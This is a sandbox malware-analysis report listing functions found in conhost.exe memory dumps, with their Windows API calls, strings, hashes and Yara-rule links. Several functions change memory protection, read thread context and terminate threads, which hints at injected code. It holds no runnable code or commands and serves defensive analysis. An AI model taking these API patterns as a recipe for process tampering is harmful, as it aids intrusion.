Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: cbb7e0c3d577a3369309231917845af64c5e54c8c93f8bb06b908fe720062e5c
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 6F31D231A12A4081EE29AB8AA8003E52F96F745BE0F5D0539FD194B797DF3CC6668306

Function 0000013F08E99AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,0000013F08E99C6B,?,?,?,0000013F08E9945C,?,?,?,?,0000013F08E98F65), ref: 0000013F08E99B31
GetLastError.KERNEL32(?,?,?,0000013F08E99C6B,?,?,?,0000013F08E9945C,?,?,?,?,0000013F08E98F65), ref: 0000013F08E99B3F
LoadLibraryExW.KERNEL32(?,?,?,0000013F08E99C6B,?,?,?,0000013F08E9945C,?,?,?,?,0000013F08E98F65), ref: 0000013F08E99B69
FreeLibrary.KERNEL32(?,?,?,0000013F08E99C6B,?,?,?,0000013F08E9945C,?,?,?,?,0000013F08E98F65), ref: 0000013F08E99BD7
GetProcAddress.KERNEL32(?,?,?,0000013F08E99C6B,?,?,?,0000013F08E9945C,?,?,?,?,0000013F08E98F65), ref: 0000013F08E99BE3

Strings

api-ms-, xrefs: 0000013F08E99B51

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: a18985252ef3edf6a851d83ddb1dca33b8ed87cc749b1fd8e85daac6ebc6c706
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 3B311231A02B80C1EE19AB8A98003E56F96B745BA0F59053CFD9D47793EF7CC606C306

Function 0000013F08E73400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000013F08E73431
GetLastError.KERNEL32 ref: 0000013F08E7343D
CloseHandle.KERNEL32 ref: 0000013F08E73455
CreateFileW.KERNEL32 ref: 0000013F08E73480
WriteConsoleW.KERNEL32 ref: 0000013F08E7349F

Strings

CONOUT$, xrefs: 0000013F08E73461

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 690052e63b550191830be9ebf8626ea8a399a71039ecc004b53aeab5a6de32c6
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 0A119031B10F4082E7688B9AE8547596BA2F388BE4F400238FA5E87B95DF3CC6058741

Function 0000013F08EA3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000013F08EA3431
GetLastError.KERNEL32 ref: 0000013F08EA343D
CloseHandle.KERNEL32 ref: 0000013F08EA3455
CreateFileW.KERNEL32 ref: 0000013F08EA3480
WriteConsoleW.KERNEL32 ref: 0000013F08EA349F

Strings

CONOUT$, xrefs: 0000013F08EA3461

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 80c2b6a9e28103125dec7d598a38dbe6a0972cd768721bb13ca4962e299bdd06
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: A4119331B10B40C2E7548BDAE85475AAAA1F388FF4F404238FA5D87BA5CF3CD6058741

Function 0000013F08E66270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000013F08E662AB
GetThreadContext.KERNEL32 ref: 0000013F08E66415

Part of subcall function 0000013F08E660A0: GetCurrentThreadId.KERNEL32 ref: 0000013F08E660A4

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 537ddf30648d4c2d7a44bc6e95cfe549e430ea49278c419fc20f448c823155ca
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 46D1AE36614F8885DA74DB4AE49439E7BA1F7D8B88F100226EA8D477B6CF3CC655CB01

Function 0000013F08E96270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000013F08E962AB
GetThreadContext.KERNEL32 ref: 0000013F08E96415

Part of subcall function 0000013F08E960A0: GetCurrentThreadId.KERNEL32 ref: 0000013F08E960A4

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: f0d63cc57cf04dfc642858e7f01280d443280659947f9e26885c173f40200a21
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 1CD18D76604B8881DA74DB5AE49439A7BA1F3D8B88F100126EECD477B6DF7CC652CB01

Function 0000013F08E62098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0000013F08E620A6
TlsFree.KERNEL32 ref: 0000013F08E6225F
TlsFree.KERNEL32 ref: 0000013F08E6226B
TlsFree.KERNEL32 ref: 0000013F08E62277
TlsFree.KERNEL32 ref: 0000013F08E62283
TlsFree.KERNEL32 ref: 0000013F08E6228F

Part of subcall function 0000013F08E65E50: GetCurrentThreadId.KERNEL32 ref: 0000013F08E65E66

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 6b385fcda49ae4c1c5ed49bcbf28ce52ae76f95c7e1b15668f16738804775df5
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 3C517431A01B4595EE1D9BADD8512D83BA2BB04788F840939F62D067A7EF7CC727C346

Function 0000013F08E92098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0000013F08E920A6
TlsFree.KERNEL32 ref: 0000013F08E9225F
TlsFree.KERNEL32 ref: 0000013F08E9226B
TlsFree.KERNEL32 ref: 0000013F08E92277
TlsFree.KERNEL32 ref: 0000013F08E92283
TlsFree.KERNEL32 ref: 0000013F08E9228F

Part of subcall function 0000013F08E95E50: GetCurrentThreadId.KERNEL32 ref: 0000013F08E95E66

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 5cdf3b258975b40943ee960dba912c33897a440bc565dffd740ee5262b3150dc
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 2451BB31A01B85A5EF0D9B9DD8512D93B62BB04744F440839FA6D063A6EFBCCB1AC746

Function 0000013F08E635C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,0000013F08E624D1), ref: 0000013F08E635EB
HeapAlloc.KERNEL32(?,?,?,?,?,0000013F08E624D1), ref: 0000013F08E635FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,0000013F08E624D1), ref: 0000013F08E63673
GetProcessHeap.KERNEL32(?,?,?,?,?,0000013F08E624D1), ref: 0000013F08E636D9
HeapFree.KERNEL32(?,?,?,?,?,0000013F08E624D1), ref: 0000013F08E636E7

Strings

$rbx-, xrefs: 0000013F08E6366C

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: a4769114bc517b3848b0b9af6c2565d933254e984f544f6f22cc782a5dfaaf0d
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 0A31A231B01B5192EA29DF9AD5403ADABA2FB54BC4F084038EF5907B56EF3CC6728701

Function 0000013F08E935C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,0000013F08E924D1), ref: 0000013F08E935EB
HeapAlloc.KERNEL32(?,?,?,?,?,0000013F08E924D1), ref: 0000013F08E935FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,0000013F08E924D1), ref: 0000013F08E93673
GetProcessHeap.KERNEL32(?,?,?,?,?,0000013F08E924D1), ref: 0000013F08E936D9
HeapFree.KERNEL32(?,?,?,?,?,0000013F08E924D1), ref: 0000013F08E936E7

Strings

$rbx-, xrefs: 0000013F08E9366C

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: b2cd68a352fd82a9a42ef0ef3c40a9da413980e6b1ca8e99e4f23c5f2ab5b8eb
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: DF31C432B01B9192E718CF9AD5403A9EBA2FB54B84F085038EF9947757EF7CD6628701

Function 0000013F08E6C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000013F08E6C94F
SetLastError.KERNEL32 ref: 0000013F08E6C96E
FlsSetValue.KERNEL32 ref: 0000013F08E6C997
FlsSetValue.KERNEL32 ref: 0000013F08E6C9A8
FlsSetValue.KERNEL32 ref: 0000013F08E6C9B9

Part of subcall function 0000013F08E6D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000013F08E6674A), ref: 0000013F08E6D2B6
Part of subcall function 0000013F08E6D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000013F08E6674A), ref: 0000013F08E6D2C0

SetLastError.KERNEL32 ref: 0000013F08E6C9DC

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 324aa47008ed4888e14accf744bb9e67e3b23562f74d280973f2828beb3b8a7f
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 83113D31B04640C2FA1C67BAB8113EE2A53AB857D0FA4463CF86A567C7CE3CD6234702

Function 0000013F08E9C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000013F08E9C94F
SetLastError.KERNEL32 ref: 0000013F08E9C96E
FlsSetValue.KERNEL32 ref: 0000013F08E9C997
FlsSetValue.KERNEL32 ref: 0000013F08E9C9A8
FlsSetValue.KERNEL32 ref: 0000013F08E9C9B9

Part of subcall function 0000013F08E9D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000013F08E9674A), ref: 0000013F08E9D2B6
Part of subcall function 0000013F08E9D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000013F08E9674A), ref: 0000013F08E9D2C0

SetLastError.KERNEL32 ref: 0000013F08E9C9DC

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: a4d0ef141a8a1ad4b95b4f5fe985f4c17308c55216fce95e2d9834c974a172ae
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: D4113A31B0169082FA1C77F9A9513EE1A53AB85B90F68463CFCAA563C7CE6CD6034202

Function 0000013F08E61A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000013F08E61A56
K32GetModuleFileNameExW.KERNEL32 ref: 0000013F08E61A74
PathFindFileNameW.SHLWAPI ref: 0000013F08E61A83
lstrlenW.KERNEL32 ref: 0000013F08E61A8F
StrCpyW.SHLWAPI ref: 0000013F08E61AA2
CloseHandle.KERNEL32 ref: 0000013F08E61AB0

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 90ae191381c9755cd8fca52df00ca19f8d19ae3b26cba7903aa6c1953b3a5c31
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: A001ED31B14B8086FB28DB56E85879967A2F788FD0F484039EE5D43755DE3CC686C741

Function 0000013F08E91A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000013F08E91A56
K32GetModuleFileNameExW.KERNEL32 ref: 0000013F08E91A74
PathFindFileNameW.SHLWAPI ref: 0000013F08E91A83
lstrlenW.KERNEL32 ref: 0000013F08E91A8F
StrCpyW.SHLWAPI ref: 0000013F08E91AA2
CloseHandle.KERNEL32 ref: 0000013F08E91AB0

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 85d1de4976a73203d4d594c03d28c3810873dd103db496e23c046ab074ad2b3e
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: D4018431B00B8196EB18DB96A494399A7A2F788FD0F484039EE9D43755DF7CCA46C741

Function 0000013F08E63E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000013F08E63AAC), ref: 0000013F08E63E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000013F08E63AAC), ref: 0000013F08E63E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000013F08E63AAC), ref: 0000013F08E63E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000013F08E63AAC), ref: 0000013F08E63E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000013F08E63AAC), ref: 0000013F08E63E9F
TerminateThread.KERNEL32(?,?,?,?,?,0000013F08E63AAC), ref: 0000013F08E63EAE

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: aea703ebb3aca2ef8898bc70abe5816b1478e7e2b8660eeb20f9ee16a3cca2c3
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: CD012175B11B40C2FB2C9BA9E8487997BA2BB46B85F04003CE94D06356EF3DC65AC702

Function 0000013F08E93E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000013F08E93AAC), ref: 0000013F08E93E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000013F08E93AAC), ref: 0000013F08E93E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000013F08E93AAC), ref: 0000013F08E93E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000013F08E93AAC), ref: 0000013F08E93E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000013F08E93AAC), ref: 0000013F08E93E9F
TerminateThread.KERNEL32(?,?,?,?,?,0000013F08E93AAC), ref: 0000013F08E93EAE

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 99c38f5c98d9411b5837f339c2cde23e8ba47f7c6757f3470eb21fd0d0568f95
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 73015E35A01740D2EB289BE9E4983967AA2AB45B51F14003CED8D06356EF3DC64A8706

Function 0000013F08E61AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000013F08E61AF4
StrCmpNIW.SHLWAPI ref: 0000013F08E61B0E
lstrlenW.KERNEL32 ref: 0000013F08E61B1D
